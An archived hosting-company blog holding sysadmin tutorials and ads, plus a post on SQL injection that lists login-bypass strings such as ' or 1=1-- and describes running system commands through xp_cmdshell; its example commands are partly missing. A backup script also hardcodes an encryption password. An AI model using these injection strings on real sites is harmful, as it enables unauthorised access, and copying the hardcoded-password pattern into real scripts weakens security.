Managed hosting services from Star Dot Hosting
Posted by Kevin in Company Announcements on January 17, 2012
Hello There,
This update is to highlight the managed hosting services and systems administration services offered by Star Dot Hosting.
We are proud to offer some of the highest standards of managed hosting services in the industry. Here are some of the services we offer :
- 24x7x365 Monitoring, Alerting & Trending
- 24x7x365 ~15minute response time support ticketing system
- Quarterly Security Auditing & Reporting
- Patch management & Maintenance
- Administration, troubleshooting, deployment and code pushes
- Hardware upgrades, deployments, expansion
- Dedicated load balancing
- Dedicated firewalls
- Database replication & clustering
- Dedicated edge content caching
Those are just some of the services we would provide to you! Our quotation process involves rigorous consultations which includes technology assessment and especially a complete understanding of how your scenario can be designed and where improvements can be made, if any.
Feel free to click the link below to visit our managed hosting page, and fill out a quotation request form!
http://www.stardothosting.com/managed-hosting/
Related Links:
Backup, compress and encrpyt your git repository
Posted by Kevin in GIT, Shell Scripting on November 25, 2011
Greetings,
I thought I’d share a quick script in the scope of backing up GIT repositories for the purposes of encrypted and compressed off-site backups.
Unfortunately git does not have an equivalent of svnadmin dump or export, which can conveniently be piped to stdout.
What the above scenario would do is shorten the amount of commands a script would require in order to accomplish a similar task.
Find below a quick bash script that clones a repository, tar/gzip’s it, encrypts the archive and keeps 7 days worth of archive files :
#!/bin/sh
# GIT Backup script
# Written by Star Dot Hosting
todaysdate=`date "+%Y-%m-%d"`
#check command input
if [ -z "$1" ];
then
echo "GIT BACKUP SCRIPT"
echo "-----------------"
echo ""
echo "Usage : ./backup.sh reponame , i.e. yourdomain.git"
echo ""
exit 0
fi
echo "GIT Backup Log: " $currentmonth > /var/log/backup.log
echo -e "----------------------------------------" >> /var/log/backup.log
echo -e "" >> /var/log/backup.log
# Find and remove files older than 7 days
/usr/bin/find /data/git/git-backups -type f -mtime +7 -delete >> /var/log/backup.log 2>&1
# Begin creating working directory to clone into
/bin/mkdir /data/git/git-backup/working >> /var/log/backup.log 2>&1
/usr/bin/git clone /data/git/$1 /data/git/git-backup/working >> /var/log/backup.log 2>&1
# Archive working directory into repo name encrpyted tar file
/bin/tar -czvf - /data/git/git-backup/working | /usr/bin/openssl enc -aes-256-cbc -pass pass:abcABC123 -e | dd of=/data/git/git-backup/$1.tar.gz.enc >> /var/log/backup.log 2>&1
# Remove working directory
/bin/rm -rf /data/git/git-backup/working >> /var/log/backup.log 2>&1
FYI if you ever needed to decrypt the openssl encrypted backup archive, the command below should do the job :
openssl aes-256-cbc -d -pass pass:abcABC123 -in $1.tar.gz.enc -out decrypted.tar.gz
Related Links:
Clone a XEN VPS server that resides on a LVM / Logical Volume Manager
Hello!
We thought it would be important to share this information as it might be interesting to someone who wants to replicate the same VPS across many instances in order to create a farm of web servers (for example).
This uses very similar concepts to our LVM XEN backup post a while back.
Step 1: Take a snapshot of the current VPS
This is simple. Use the lvcreate command with the -s option to create a snapshot of the running VPS. We assume your VPS is 5GB in size, so just replace that with however large your VPS is :
lvcreate -s -L 5GB -n snapshot_name /dev/VolGroup00/running_vps_image
Step 2: Create your new VPS
This is important. You want to create a new vps, assign a MAC and IP address first and let the creation process fully finish. Then shut the VPS down.
Step 3: Copy the snapshot to the new VPS
All you have to do is use the dd command to transfer the snapshot image to the newly created VPS image :
dd if=/dev/VolGroup00/snapshot_name of=/dev/VolGroup00/new_vps_image
All done! Dont forget to remove the snapshot after your done with it :
lvremove -f /dev/VolGroup00/snapshot_name
Start up the new vps and you should have a carbon copy of the previous vps!
Related Links:
Linux VPS, Virtual Hosting, XEN VPS Hosting, CPanel VPS Hosting or Managed Hosting Services
Posted by Kevin in Company Announcements, Hosting on August 16, 2011
Hey there,
Before I update regarding my continued experiences with Xen, KVM, Varnish, FreeBSD and all the other (exciting) things that I do, I thought I’d remind anyone here who is looking for linux vps hosting, virtual hosting or specifically xen vps hosting or even cpanel vps hosting to check out our company website : www.stardothosting.com
If you’re looking for managed hosting services, dedicated hosting or anything along those lines, feel free to fill out our managed hosting quotation form here : www.stardothosting.com/managed-hosting
Thanks!
Related Links:
Varnish Caching with Joomla
Posted by Kevin in Hosting, Load Balancing, Varnish Cache on August 8, 2011
Hello There!
One of the exciting new technologies to come out in the last few years is a tremendously efficient and dynamic caching system called Varnish (see : http://www.varnish-cache.org).
We have been employing the use of Varnish for high traffic websites for the purposes of user experience improvements as well as for redundancy and load balancing purposes.
Varnish can do it all – complex load balancing and polling based on many different weighting methodologies for fail over, as well as holding on to a “stale” cache in the event of a back end web server outage, or perhaps for geographic redundancy (holding a stale cache in a secondary data center).
One of the challenges we have faced in the many different implementations of varnish into web stacks, is dealing with dynamic and user session (i.e. “logged in”) content.
If the Internet was full of only static (see 1995) html files, varnish would work beautifully out of the box. Unfortunately the web is a complicated mess of session based authentication, POSTS, GETS and query strings among a few things.
One of our recent accomplishments was getting the Joomla 1.5 content management system to work with Varnish 2.1.
The biggest challenge for Joomla was that it creates a session cookie for all users. This means the session is created and established for any guest visiting the site, and if they decide to log in , that same session is used to establish a logged in session through authentication. This is an apparent effort to deter or avoid session hijacking.
The problem with this is that Varnish ends up caching all the logged in session content, as well as the anonymous front page content.
I spent a significant amount of time fine tuning my VCL (varnish configuration language) to play nice with Joomla. Unfortunately it became apparent that some minor modifications to the Joomla code was necessary in order for it to communicate properly with Varnish.
Step 1 : Move the login form off the front page
I realize this might be a hard decision. I cant offer an alternative. If you have an integrated login form on the front page of your site, and you wish to cache that page with varnish, you will likely have to chose one or the other. It would probably be ideal to replace that login form with a button to bring the user to a secondary page off the main page.
For the sake of argument, lets call our site “example.com” and the login page url within Joomla should look like the following :
http://www.example.com/index.php?option=com_user&view=login
Take note of login URI in this string.
The reason we need the login form on a secondary page is because we need an almost “sandboxed” section of the site where the anonymous session cookie can be established, and passed through the authentication process to a logged in session. We will tell varnish to essentially ignore this page.
Step 2 : Modify Joomla to send HTTP headers for user/guest sessions
This isn’t that hard. In the Joomla code, there is a section where it defines the HTTP headers it sends to the browser for cache variables such as expire times and whatnot. I’m going to assume you have turned off the built-in Joomla caching system.
What you need to do is tell Joomla to send a special HTTP header that will give either a True or False value if the user is logged in or not. This is useful information. It will allow varnish to not cache any logged in content such as “Welcome back, USERNAME” after the user is passed back to the front page from logging in.
In my joomla installation, I modified the following file :
The parent folder being the public_html / root folder for your Joomla installation. In this file, please find the line that determines if the Joomla caching system is disabled :
After this line, you will see about 5 HTTP header declarations (expires, last-modified, cache-control, cache-control again and pragma). Above those declarations , add the following 6 lines of code :
if (!$user->guest) {
JResponse::setHeader( 'X-Logged-In', 'True', true);
} else {
JResponse::setHeader( 'X-Logged-In', 'False', true );
}
If you read the above code, its fairly straight forward. I do a check to see if the user is a guest (aka anonymous) or not. If they are logged in I send an HTTP header called “X-Logged-In”, and assign a “True” value to it. If the user is not logged in, it sets it to “False”.
Pretty easy, right?
This will allow varnish to avoid caching a logged in user’s page.
Step 3 : Configure Varnish
This is the part that took the most time during this entire process. Mind you patching the Joomla code and whatnot took some time as well, this process took a lot of experimentation and long hours examining session cookies and host headers.
What I will do is break down the generalized configuration directives into two groups : VCL_RECV and VCL_FETCH.
VCL_RECV
In here, I set a bunch of IF statement directives to tell varnish what it should look up in the cache and what it should pipe to the backend and what it should pass. This could probably be optimized and improved upon, but it works for me :
if (req.request == "POST") {
set req.backend = iamloggedin;
return(pipe);
}
# http authenticated sessions are piped
if (req.http.Authenticate || req.http.Authorization) {
set req.backend = iamloggedin;
return(pipe);
}
# if the user is coming FROM the login page, pipe to backend
if (req.http.referer ~ "(?i)(com_user|login)") {
set req.backend = iamloggedin;
return(pipe);
}
VCL_FETCH
The fetch section is a little bit easier. I only have about 5 directives. The first one is the most important one you want to look at. It “unsets” the cookie from any page on the site, EXCEPT the login page. This allows varnish to properly establish the logged in session. The subsequent rules determine what to deliver and what to pass based on URI or HTTP header checks :
if (!req.url ~ "(?i)(login|com_user|user|logout)") {
unset beresp.http.Set-Cookie;
}
if (req.http.referer ~ "(?i)(com_user|login|logout)") {
set req.backend = iamloggedin;
return(pass);
}
if (beresp.http.x-logged-in ~ "False"){
set req.backend = webfarm;
return(deliver);
}
if (beresp.http.x-logged-in ~ "True"){
set req.backend = iamloggedin;
return(pass);
}
if (req.http.Authenticate || req.http.Authorization) {
set req.backend = iamloggedin;
return(pass);
}
Thats it! I just saved you many sleepless nights (I hope!). Hopefully your headers will look something like this after you implement varnish in front of Joomla :
P3P CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Logged-In False
Expires Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified Mon, 08 Aug 2011 20:49:37 GMT
Cache-Control post-check=0, pre-check=0
Pragma no-cache
Content-Type text/html; charset=utf-8
Content-Length 85898
Date Mon, 08 Aug 2011 21:01:52 GMT
X-Varnish 761778669 761751685
Age 735
Via 1.1 varnish
Connection keep-alive
X-Cache-Svr cache.example.com
X-Cache HIT
X-Cache-Hits 121
UPDATE : 12/08/2011
I realize I made a mistake and have corrected this post. In vcl_fetch, i had the following :
if (!req.url ~ "(?i)(login|com_user|user|logout)") {
unset req.http.Set-Cookie;
}
Well I realize I should be unsetting the response cookie, not the set cookie. For some reason, the above (erroneous) directive works only right after you login. If you start clicking around the site, your logged in session disappears. I suspect this is because either joomla or varnish is mistakenly unsetting a logged in session.
This is the correct entry (I have fixed it in my original post as well) :
if (!req.url ~ "(?i)(login|com_user|user|logout)") {
unset beresp.http.Set-Cookie;
}
After making the above change, I can login and browse the site and my session stays intact. Mind you, the Joomla site I am testing with is definitely not a vanilla Joomla installation.
I’d love to hear from anyone who has accomplished the above scenario either way!
Related Links:
New website re-design
Posted by Kevin in Company Announcements on June 14, 2011
We have re-designed our website and are very proud of the new look! Take a look for yourself :
Let us know what you think!
Related Links:
Centralized remote backup script with SSH key authentication
Posted by Kevin in FreeBSD, Linux, Shell Scripting on February 9, 2011
Greetings,
It has been a while since we posted any useful tidbits for you , so we have decided to share one of our quick & dirty centralized backup scripts.
The script relies on ssh key based authentication, described here on this blog. It essentially parses a configuration file where each variable is separated by a comma and colon, as in the example config here :
hostname1,192.168.1.1,etc:var:root hostname2,192.168.1.2,etc:var:root:usr
Note the intended backup directories in the 3rd variable, separated by colon’s. Simply populate the backup-hosts.txt config file (located in the same folder as the script) with all the hosts you want to be backed up.
The script then ssh’s to the intended host, and sends a tar -czf stream (securely) over ssh, to be output into the destination of your choice. Ideally you should centralize this script on a box that has direct access to alot of disk space.
Find the script here :
# Centralized Linux Backup Script
# By Star Dot Hosting , www.stardothosting.com
# Uses SSH Key based authentication and remote ssh commands to tar.gz folders to iSCSI storage
todaysdate=`date "+%Y-%m-%d %H:%M:%S"`
backupdest="/backups/linux-backups"
echo "Centralized Linux Backup: " $todaysdate > /var/log/linux-backup.log
echo -e "----------------------------------------------" >> /var/log/linux-backup.log
echo -e >> /var/log/linux-backup.log
for obj0 in $(cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | awk -F "," '{printf "%s\n", $2}');
do
backupname=`cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | grep $obj0 | awk -F "," '{printf "%s\n", $1}'`
for obj1 in $(cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | grep $obj0 | awk -F "," '{printf "%s\n", $3'} | awk '{gsub(":","\n");printf"%s", $
0}');
do
echo -e "backing up $obj0 with $obj1 directory" >> /var/log/linux-backup.log
ssh -l root $obj0 "(cd /$obj1/ && tar -czf - . -C /$obj1)" >> $backupdest/$backupname.$obj1.tar.gz 2>&1
if [ "$?" -eq 1 ]
then
echo -e "There were some errors while backing up $obj0 / $backupname within the $obj1 directory" >> /var/log/linux-backup.log
#exit 1
else
echo -e "Backup completed on $obj0 / $backupname while backing up $obj1 directory" >> /var/log/linux-backup.log
fi
done
done
echo "Backup Script Completed." >> /var/log/linux-backup.log
cat /var/log/linux-backup.log | mail -s "Centralized Backup Complete" topsoperations@topscms.com
You could modify this script to keep different daily backups , pruned to keep only X number of days of backups (i.e. only 7 days worth). There is alot you can do here.
If you have a handful of linux or bsd servers that you would like to backup in a centralized location, without having an individual script to maintain on each server, then perhaps you could use or modify this script to suit your needs.
I hope this helps.
Related Links:
50% off any hosting plan for the first THREE months!
Posted by Kevin in Company Announcements, Hosting on December 13, 2010
We are excited about a new promotion for our web hosting catalog here at *.hosting.
We are offering a 50% discount for ANY of our SHARED or VPS hosting plans for the first 3 (thats THREE) months!!!!
Simply enter the following promotional code during the signup process :
It’s that simple! The 50% discount will then be immediately applied to the first three months of hosting — no matter what the hosting plan you chose!
Happy Holidays from Star Dot Hosting!
Related Links:
Security Penetration Testing Series : SQL Injection
Posted by Kevin in Database, Security, Shell Scripting on November 15, 2010
I am starting a series of blog posts that detail security related strategies, penetration testing and best practice methodologies. To start our series, I am going to delve into the world of SQL injection techniques and a general overview for those who are looking to learn a little more about this method of injection.
There is already quite a bit of documentation out there regarding this, so I hope this post isn’t too redundant. There are a lot of tools out there to assist in accomplishing this task, or at the very least tools that assist in automating the probing and injection of SQL from publicly facing websites, forms and the like.
That tool is SQLMAP (http://sqlmap.sourceforge.net/). SQLMAP is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.”
This article does not introduce anything new, SQL injection has been widely written and used in the wild. I thought I’d write this article to document some of the SQL injection methods and hope that it may be of use to some of you out there in cyberspace.
What is SQL injection anyway?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
What do you need?
Technically all you need is a web browser.
What should I look for?
Web forms. Any input area of a website that interacts with their database backend. Could be a login form, search form or anything like that.
You could also look for pages that actually have querystrings in the URL such as :
Testing if its vulnerable
With those query string URLs or web forms, you could do a simple test to see if its vulnerable to injection. Start with the “single quote trick” , something like this :
For example :
If you do that in a login form for example, if it works, then you will be logged in without any password necessary.
Why ‘ or 1=1–?
Let us look at another example why ‘ or 1=1– is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
In the URL, ‘category’ is the variable name, and ‘food’ is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, ‘food’.
Now, assume that we change the URL into something like this:
Now, our variable v_cat equals to “food’ or 1=1– “, if we substitute this in the SQL query, we will have:
The query now should now select everything from the product table regardless if PCategory is equal to ‘food’ or not. A double dash “–” tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote (‘). Sometimes, it may be possible to replace double dash with single hash “#”.
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
The SQL query will now become:
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Remote execution with SQL injection
Being able to inject SQL commands usually means we can execute any SQL query at will.Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
Try using double quote (“) if single quote (‘) is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
Getting the output of my SQL query
It is possible to use sp_makewebtask to write your query into an HTML:
But the target IP must folder “share” sharing for Everyone.
Hope this helps!
Related Links:
Migrate from Linux to Xen with Rsync
I decided to write this little guide to provide the relatively simple steps needed to migrate your linux system to a Xen (HVM) virtual instance.
It is assumed that on your source and destination boxes, that you only have one root “/” partition. If you partitioned out your file system differently, you will have to accommodate that based on these instructions.
The following steps walk you through the process of migrating linux to Xen from start to finish :
1. Install the exact same version of linux on your destination server
This isn’t really 100% necessary, obviously. You could always boot into Finnix, partition your disk and install Grub. If you are uncomfortable doing that, install the distribution from start to finish. The file system will be overwritten anyways.
2. Boot into finnix on the destination system
If you have never used Finnix, it is a “self contained, bootable linux distribution”. I like it alot actually and have used it for similar purposes, rescue operations and the like.
3. Setup networking on both destination and source systems
If both systems are on the same network, you could assign local IP addresses to ensure the process of synchronisation is speedy and unobstructed.
Ensure you configure networking either way and that you set a root password and start ssh :
/etc/init.d/ssh start
4. Mount the partition that you want to copy to on the destination server
Remember, so far everything you are doing has been on the destination server. Mount the destination partition within finnix :
5. On the source server, rsync all the files of the source partition to the destination partition
When logged into the source server, simply issue the following rsync command and direct it to the destination server’s partition you just mounted :
The rsync process will complete and the partition on the destination server should be ready to boot into. Remember to change the networking configuration if you dont want any IP conflicts to happen.
I hope this helps!
Related Links:
Looking for Web Hosting?
Security Focus- Vuln: Pligg CMS 'status' Parameter SQL Injection Vulnerability
- Vuln: SSL/TLS Protocol Initialization Vector Implementation Information Disclosure Vulnerability
- Vuln: Google Chrome Prior to 16.0.912.75 Multiple Security Vulnerabilities
- Vuln: Apple Safari 'libxml' (CVE-2011-0216) Remote Code Execution Vulnerability
- Bugtraq: [SECURITY] [DSA 2394-1] libxml2 security update
- Bugtraq: ESA-2012-007: RSA, The Security Division of EMC, announces security fixes for RSA enVision
- Bugtraq: ESA-2012-005: EMC NetWorker buffer overflow vulnerability
- Bugtraq: Cisco Security Advisory: Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability
- More rss feeds from SecurityFocus
- CERT Advisories
- TA12-024A -- "Anonymous" DDoS Activity
- Current Activity - Denial-of-Service Malware Campaign
- Current Activity - Google Releases Chrome 16.0.912.77
- Current Activity - Symantec pcAnywhere Hotfix
- Current Activity - Best Practices for Recovery from the Malicious Erasure of Files
- Current Activity - Oracle Releases Critical Patch Update for January 2012
- Current Activity - Phishing Campaign Using Spoofed US-CERT Email Addresses
- Current Activity - Adobe Releases Security Advisory for Adobe Reader and Acrobat
- Current Activity - Microsoft Releases January Security Bulletin
- TA12-010A -- Microsoft Updates for Multiple Vulnerabilities
- Open Source Security
- Re: CVE request: PostfixAdmin SQL injections and XSS
- Re: CVE Request: Debian (others?) openssh-server: Forced Command handling leaks private information to ssh clients
- Subscribe to linux-distros
- testing pwqgen
- Re: CVE Request: Debian (others?) openssh-server: Forced Command handling leaks private information to ssh clients
- Re: XSLT issue in MoinMoin
- Re: Fwd Joomla! Security News 2012-01
- Re: CVE Request: Debian (others?) openssh-server: Forced Command handling leaks private information to ssh clients
- CVE Request: Debian (others?) openssh-server: Forced Command handling leaks private information to ssh clients
- Re: CVE request: wicd writes sensitive information in log files (password, passphrase...)
- SecurityFocus
- News: Change in Focus
- News: Twitter attacker had proper credentials
- News: PhotoDNA scans images for child abuse
- News: Conficker data highlights infected networks
- Brief: Google offers bounty on browser bugs
- Brief: Cyberattacks from U.S. "greatest concern"
- Brief: Microsoft patches as fraudsters target IE flaw
- Brief: Attack on IE 0-day refined by researchers
- News: Monster botnet held 800,000 people's details
- News: Google: 'no timetable' on China talks
Twitter
